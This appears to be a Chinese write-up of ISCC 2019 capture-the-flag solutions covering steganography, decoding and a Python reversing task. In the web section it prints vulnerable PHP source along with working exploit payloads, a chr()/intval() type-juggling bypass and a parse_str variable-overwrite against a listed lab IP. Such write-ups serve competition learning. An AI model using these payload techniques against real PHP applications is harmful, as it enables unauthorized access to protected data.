iscc2019

iscc2019

misc

welcome

加上后缀zip,打开将“蓅烺計劃 洮蓠朩暒”替换为0,“戶囗 萇條”替换为1。得到二进制串011001100110110001100001011001110111101101001001010100110100001101000011010111110101011101000101010011000100001101001111010011010100010101111101

转换为ascii码

得到flag{ISCC_WELCOME}

最危险的地方就是最安全的地方

winhex打开下载的图片。发现藏有zip文件,搜索504B0304,复制选块到新文件打开,有50张图片。最后一张图片的属性->详细信息有一串base64 ZmxhZ3sxNWNDOTAxMn0=

解密得到flag{15cC9012}。最后有个脑洞,提交的时候只提交括号里的。

无法运行的exe

用notepad++打开得到一串字符串iVBORw0KGgAAAAANSUhEUgAAASkAAAEpAQAAAADn4ukvAAACAklEQVR4nO2aQY6bQBBF3wdLsGvvsoSb4JzM+GbmCLmBvcwOFpFAMvwsIJ5ZjsRkcEj3BlR6Un9apa+qLmQ+sC7JRyiIWMQiFrGIfRjrNK+yy0eJi0oYl1i+sbY9YJlt+0roDgBVcwTZttvNte0BGyXV0OXInC9VCyCpfAFt+8FCn04s2ftlm/4/WBcGSTrR5V+36Z6xw/xIDTSELpsSzt/L0I5goNtQ2w6w+XgHAVB034bUguJH/stzLNtO216w4HndGA5gne5H0iXWb6xtN9hFZejTUfKV0I8Jqpuyi3XvJ2FnNwpDaqhuz2CI2bsG4+kA9rVwjwyVW9IJ+7p0HPUrf8IrY8ytWTrhurqxWO6NzDZUt9mW4/Guw8bU0JSAxeVUtACO3rsWW7J38QT3sycUbfbQWxrH7F2HZZ6ARgoPWTWEHmvJ5421/dPY0rXhxHAvB2kyzf34M9ekjbXtBxtTS6pa0gnVFPcci3NsK1Zi+P1qM0+8qxwo2ui9q7HntCJ0SlimFQmcfdtc2x6wP9OKLjw0Jy3pBHA/bq5tD9gyrViGQdyPgyRoqui9n4llD0u+QvYA1xDbis/EhoPsGkJ3kLmcvmTTHWMsBYM9X+nMlw92nz5riVg5rMUGzSM2siFBvgJYql9B2z+NHQDC23986fKaPTDE+96IRSxiEfsb2G/jeCyvdHD3rQAAAABJRU5ErkJggg==

在http://www.tomeko.net/online_tools/base64.php?lang=en将字符串转为dat文件,用winhex打开发现头部右侧显示png但左侧hex值不对(正确应为89 50 4E 47 0D 0A 1A 0A),修改之后将后缀改为png打开,是二维码,扫码得到flag

Aesop’s secret

下载解压之后是一个gif图片,用记事本打开,在末尾找到字符串U2FsdGVkX19QwGkcgD0fTjZxgijRzQOGbCWALh4sRDec2w6xsY/ux53Vuj/AMZBDJ87qyZL5kAf1fmAH4Oe13Iu435bfRBuZgHpnRjTBn5+xsDHONiR3t0+Oa8yG/tOKJMNUauedvMyN4v4QKiFunw==

推测是aes加密,密码猜测是ISCC

两次解密得flag

https://zhuanlan.zhihu.com/p/30323085

他们能在一起吗?

打开是个二维码,扫码得到UEFTUyU3QjBLX0lfTDBWM19ZMHUlMjElN0Q=

base64解密再url转码,得到PASS{0K_I_L0V3_Y0u!}

不符合flag格式,继续看。

winhex打开二维码图片,再最后发现有you won’t wanner .txt字样,推测含有zip文件,搜索16进制数值504b0304(zip文件头),将选块分离出来,得到加密压缩包。密码时之前扫码得到的。ISCC{S0rrY_W3_4R3_Ju5T_Fr1END}

reverse

简单python

在线反编译

  • import base64
    

def encode(message):
s = ''
for i in message:
    x = ord(i) ^ 32
    x = x + 16
    s += chr(x)

return base64.b64encode(s)

correct = 'eYNzc2tjWV1gXFWPYGlTbQ=='
flag = ''
print 'Input flag:'
flag = raw_input()
if encode(flag) == correct:
print 'correct'
else:
print 'wrong'
``


逻辑挺清楚的,将correctbase64.b64decode之后,将每一个字符串的ASCII码值-16,再与32异或得到flag

exp

import base64

correct ='eYNzc2tjWV1gXFWPYGlTbQ=='

s = base64.b64decode(correct)

flag =''
for i in s:
    i = chr((ord(i)-16)^32)
    flag += i
print flag

web

web1

PHP代码审计


error_reporting(0);
require 'flag.php';
$value = $_GET['value'];
$password = $_GET['password'];
$username = '';

for ($i = 0; $i < count($value); ++$i) {
    if ($value[$i] > 32 && $value[$i] < 127) unset($value);
    else $username .= chr($value[$i]);
    if ($username == 'w3lc0me_To_ISCC2019' && intval($password) < 2333 && intval($password + 1) > 2333) {
        echo 'Hello '.$username.'!', '
'
, PHP_EOL; echo $flag, '
'
; } } highlight_file(__FILE__);

需要几个trick

1.chr()会模256所以value值加上256就可绕过if的判断

2.intval()在处理16进制时存在问题,但强制转换时时正常的.

payload

value[0]=375&value[1]=307&value[2]=364&value[3]=355&value[4]=304&value[5]=365&value[6]=357&value[7]=351&value[8]=340&value[9]=367&value[10]=351&value[11]=329&value[12]=339&value[13]=323&value[14]=323&value[15]=306&value[16]=304&value[17]=305&value[18]=313&password=0x1233

web4

 
error_reporting(0);
include("flag.php");
$hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a';
$parsed = parse_url($_SERVER['REQUEST_URI']);
if(isset($parsed["query"])){
    $query = $parsed["query"];
    $parsed_query = parse_str($query);//可变量覆盖
    if($parsed_query!=NULL){
        $action = $parsed_query['action'];
    }

    if($action==="auth"){
        $key = $_GET["key"];
        $hashed_input = hash('sha256', $key);
        if($hashed_input!==$hashed_key){
            die("");
        }

        echo $flag;
    }
}else{
    show_source(__FILE__);
}?> 

payload:39.100.83.188:8066/?hashed_key=1eb79602411ef02cf6fe117897015fff89f80face4eccd50425c45149b148408&action=auth&key=this

利用变量覆盖将hashed_key的值替换为key用sha256加密后的值

你可能感兴趣的:(ctf)